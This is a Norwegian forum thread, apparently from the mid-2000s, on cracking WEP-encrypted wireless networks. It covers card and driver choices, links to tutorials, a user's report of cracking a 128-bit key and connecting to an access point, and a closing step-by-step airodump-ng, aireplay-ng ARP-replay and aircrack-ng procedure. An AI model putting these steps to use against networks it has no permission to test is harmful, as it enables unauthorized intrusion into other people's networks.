Herre!
For all del, IKKE bruk ndiswrapper på ting som er støttet native.

Hostap-driveren på G650 og Madwifi på 650+ (bare A1-versjonen) er knall, begge funker med injection om du patcher.

Dette er en liten samling linker for dere som har lyst til å starte et angrep mot et trådløst nettverk med WEP, fra scratch. Jeg er ingen übereksert på området, og velger heller å gi dere noen linker som er nyttige.

Generelt sett trenger dere følgende:

1. Linux. En eller annen LiveCD fungerer også, og da er Auditor Security Tools og Knoppix STD de mest aktuelle å bruke.
   
2. Et kort som støtter passive mode under Linux, og kan brukes med kismet o.l. Dette er forøvrig grunnen til at man ikke kan bruke Windows til formålet, da de færreste proprietære drivere støtter dette. Kort som støttes av kismet er blant annet de som er basert på prism54, ralink, orinoco eller bruker wlan-ng. Det er såklart flere kort som er støttet, og den lista ligger her (bla ned pkt. 11). Personlig har jeg god erfaring med Asus WL-167g (usb, ralink), SMC2835W (versjon 1, pcmcia, prism54) og D-Link DWL-122 (d-link er dårlig, men dette har prism2-chipset og funker på LinuxPPC, usb, wlan-ng).
   
3. Tid. På et lite trafikkert WLAN vil det ta rimelig lang tid å samle nok pakker.

Linkene under er til guidene til Tomsnetworking. Disse er et utmerket utgangspuntkt for de som aldri har gjort dette før.
How To Crack WEP – Part 1: Setup & Network Recon
How To Crack WEP - Part 2: Performing the Crack

Dere som kjører Mac OS X kan bruke KisMAC, helst en av versjonene jeg har lagt ut her. Nå vet jeg ikke hvor bra det er å sanke pakker med Airport Extreme, men hvis dere har f.eks en D-Link DWL-122, eller har PowerBook og har SMC2835W v1 liggende, så er det fullt mulig å bruke disse til å scanne med. KisMAC har egne menyvalg for cracking av WEP, og for en del aktive angrep.

Ser ut som om dette kun gjelder for Linux ??

Isåfall, hvordan gjøres det i Windows XP/VISTA ??

Generelt sett trenger dere følgende:
[*]Et kort som støtter passive mode under Linux, og kan brukes med kismet o.l. Dette er forøvrig grunnen til at man ikke kan bruke Windows til formålet, da de færreste proprietære drivere støtter dette.

Ser ut som om dette kun gjelder for Linux ??

Isåfall, hvordan gjøres det i Windows XP/VISTA ??

luring, dette gjøres med en live-cd som du kjører bare midlertidig og funker på nesten alle trådløse pakkesendere.....

Live-cd ?? Kan du forklare nermere ?

Da var det gjort, har klart å knekke en 128 bit Wep nøkkel, tror jeg hadde litt over 500.000 ivs, de fleste guider sier at en trenger minst en mill pakker.

Logger inn på acsess punktet, men har ikke nett, klarer heller ikke og få kontakt med router, dvs innlogging, kan mac filtrering være satt på? skulle vel ikke ha klart å logge på i utgangspunktet?

(hvordan)

Wep Cracking Procedures
1) Use Backtracks (available from http://www.remote-exploit.org)
2) Boot up computer and open a terminal.
3) Terminal #1
4) Type: wlanconfig ath0 destroy (as necessary for all wireless cards i.e. ath0 or ath1)
5) Then type: wlanconfig ath0 create wlandev wifi0 wlanmode monitor
6) Then type: ifconfig ath0 up (and as necessary for the other wireless cards)
7) Then type: airodump-ng - -ivs - -channel 11 –w capture ath0
8) Open up a second terminal to run a arpreplay attack.
9) Type in Terminal #2
10) Type: aireplay-ng - -arpreplay –e (ESSID) –b (Mac of AP) –h (Mac of Client) ath0
11) Then sit back and watch the Data packet rise and have a martini until you have gathered enough packets to crack the wep key. Minimum 200,000 (1,000,000 minimum I recommend) – 500,000.
12) After collecting the desired amount of packets open a 3rd terminal (Do Not close either of the other Terminals until you have cracked the WEP KEY!!!!)
13) Type in Terminal #3
14) Type: aircrack-ng –n 128 –f 4 capture-01.ivs (this is for 128 bit encryption, for 64 bit encryption replace the 128 with 64)
15) If the key is found it will appear very shortly, if it does not try capturing more packets.
16) Viola you have just cracked a 128 bit wep key.